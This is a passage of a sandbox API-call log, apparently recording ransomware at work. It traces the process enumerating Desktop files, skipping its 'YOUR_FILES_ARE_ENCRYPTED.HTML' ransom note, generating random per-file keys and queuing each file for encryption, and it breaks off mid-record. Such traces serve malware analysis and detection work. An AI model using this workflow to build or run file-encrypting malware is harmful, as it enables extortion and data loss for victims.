PathFindExtensionW (pszPath="tObRHMtn3GHXI.pps") returned=".pps" [0166.277] lstrlenW (lpString=".pps") returned 4 [0166.277] PathFindExtensionW (pszPath="tObRHMtn3GHXI.pps") returned=".pps" [0166.278] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps" (normalized: "c:\\users\\5alr3u30d3\\desktop\\tobrhmtn3ghxi.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.278] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=95854) returned 1 [0166.278] GetProcessHeap () returned 0x270000 [0166.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.280] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="45") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="F2") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="37") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="76") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="3A") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="D2") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="30") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="64") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="54") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="62") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="6A") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="10") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="FE") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6E") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="62") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="BD") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2B") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="57") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B7") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="14") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6F") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D5") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="B4") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="3E") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="22") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="09") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="CC") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="25") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="B6") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="5B") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="BA") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="08") returned 2 [0166.282] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps" [0166.282] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.282] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.291] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d57ed90, ftCreationTime.dwHighDateTime=0x1d7dcfc, ftLastAccessTime.dwLowDateTime=0x77a98180, ftLastAccessTime.dwHighDateTime=0x1d7e618, ftLastWriteTime.dwLowDateTime=0x77a98180, ftLastWriteTime.dwHighDateTime=0x1d7e618, nFileSizeHigh=0x0, nFileSizeLow=0x11710, dwReserved0=0x0, dwReserved1=0x60, cFileName="ueq NoJbA.jpg", cAlternateFileName="UEQNOJ~1.JPG")) returned 1 [0166.291] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg") returned 45 [0166.291] lstrcmpW (lpString1="ueq NoJbA.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.291] PathFindExtensionW (pszPath="ueq NoJbA.jpg") returned=".jpg" [0166.291] lstrlenW (lpString=".jpg") returned 4 [0166.291] PathFindExtensionW (pszPath="ueq NoJbA.jpg") returned=".jpg" [0166.291] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ueq nojba.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.292] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=71440) returned 1 [0166.292] GetProcessHeap () returned 0x270000 [0166.292] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.400] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="A2") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="83") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="86") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="72") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="BA") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="35") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5D") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="DD") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="EC") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C6") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="CD") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="31") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="D4") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="7E") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C1") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="0B") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="B3") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="77") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="44") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="35") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A8") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="BE") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="29") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="DC") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A3") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="9A") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="85") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="FF") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="BF") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="CB") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="9E") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5A") returned 2 [0166.402] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg" [0166.402] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.402] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.412] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x940e01b0, ftCreationTime.dwHighDateTime=0x1d7e3e9, ftLastAccessTime.dwLowDateTime=0x2d26bc50, ftLastAccessTime.dwHighDateTime=0x1d7e6a3, ftLastWriteTime.dwLowDateTime=0x2d26bc50, ftLastWriteTime.dwHighDateTime=0x1d7e6a3, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0x0, dwReserved1=0x60, cFileName="UFJ2mOfKA7l3w86naRrT.doc", cAlternateFileName="UFJ2MO~1.DOC")) returned 1 [0166.412] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc") returned 56 [0166.412] lstrcmpW (lpString1="UFJ2mOfKA7l3w86naRrT.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.412] PathFindExtensionW (pszPath="UFJ2mOfKA7l3w86naRrT.doc") returned=".doc" [0166.412] lstrlenW (lpString=".doc") returned 4 [0166.412] PathFindExtensionW (pszPath="UFJ2mOfKA7l3w86naRrT.doc") returned=".doc" [0166.412] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ufj2mofka7l3w86narrt.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.413] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=68616) returned 1 [0166.413] GetProcessHeap () returned 0x270000 [0166.413] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.413] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="38") returned 2 [0166.413] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="23") returned 2 [0166.413] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="B3") returned 2 [0166.413] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="E5") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="7B") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="CF") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="47") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FA") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="40") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="8B") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="C5") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="AE") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="F2") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6F") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="14") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="55") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D6") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="35") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="26") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="49") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="7A") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="FF") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BB") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="EF") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6D") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="94") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="04") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="FA") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="29") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="DD") returned 2 [0166.415] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="51") returned 2 [0166.415] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="11") returned 2 [0166.415] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc" [0166.415] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.415] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.421] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd72860, ftCreationTime.dwHighDateTime=0x1d7d8b8, ftLastAccessTime.dwLowDateTime=0x43886ca0, ftLastAccessTime.dwHighDateTime=0x1d7e126, ftLastWriteTime.dwLowDateTime=0x43886ca0, ftLastWriteTime.dwHighDateTime=0x1d7e126, nFileSizeHigh=0x0, nFileSizeLow=0x1a8b, dwReserved0=0x0, dwReserved1=0x60, cFileName="wrMNMVP8WtPmed_v jD.odp", cAlternateFileName="WRMNMV~1.ODP")) returned 1 [0166.421] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp") returned 55 [0166.421] lstrcmpW (lpString1="wrMNMVP8WtPmed_v jD.odp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.421] PathFindExtensionW (pszPath="wrMNMVP8WtPmed_v jD.odp") returned=".odp" [0166.421] lstrlenW (lpString=".odp") returned 4 [0166.421] PathFindExtensionW (pszPath="wrMNMVP8WtPmed_v jD.odp") returned=".odp" [0166.421] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp" (normalized: "c:\\users\\5alr3u30d3\\desktop\\wrmnmvp8wtpmed_v jd.odp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.422] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=6795) returned 1 [0166.422] GetProcessHeap () returned 0x270000 [0166.422] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.427] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="8F") returned 2 [0166.427] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="0C") returned 2 [0166.427] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="26") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2A") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="99") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="12") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="EE") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="CB") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="9B") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0C") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="10") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="93") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B5") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="A6") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="04") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="ED") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="91") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="60") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="72") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="BF") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D4") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CA") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="77") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C9") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0D") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="88") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="53") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1C") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="BF") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="80") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="71") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="64") returned 2 [0166.429] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp" [0166.429] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.429] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.440] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdab444e0, ftCreationTime.dwHighDateTime=0x1d7de0c, ftLastAccessTime.dwLowDateTime=0xac16b480, ftLastAccessTime.dwHighDateTime=0x1d7e72e, ftLastWriteTime.dwLowDateTime=0xac16b480, ftLastWriteTime.dwHighDateTime=0x1d7e72e, nFileSizeHigh=0x0, nFileSizeLow=0x391a, dwReserved0=0x0, dwReserved1=0x60, cFileName="WWKJRamk_dmY6.flv", cAlternateFileName="WWKJRA~1.FLV")) returned 1 [0166.440] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv") returned 49 [0166.440] lstrcmpW (lpString1="WWKJRamk_dmY6.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.440] PathFindExtensionW (pszPath="WWKJRamk_dmY6.flv") returned=".flv" [0166.440] lstrlenW (lpString=".flv") returned 4 [0166.440] PathFindExtensionW (pszPath="WWKJRamk_dmY6.flv") returned=".flv" [0166.440] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv" (normalized: "c:\\users\\5alr3u30d3\\desktop\\wwkjramk_dmy6.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.452] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=14618) returned 1 [0166.452] GetProcessHeap () returned 0x270000 [0166.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.456] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="08") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="19") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="41") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="A8") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="45") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B3") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D5") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A4") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="42") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="27") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="16") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="84") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="77") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="26") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="6F") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="DB") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D0") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="48") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="6E") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="27") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6A") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="1A") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="3C") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="84") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6F") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="78") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="F2") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="60") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="8F") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="6E") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="95") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="1C") returned 2 [0166.457] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv" [0166.457] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.457] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.465] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb13f6f0, ftCreationTime.dwHighDateTime=0x1d7df79, ftLastAccessTime.dwLowDateTime=0xc7d7d4e0, 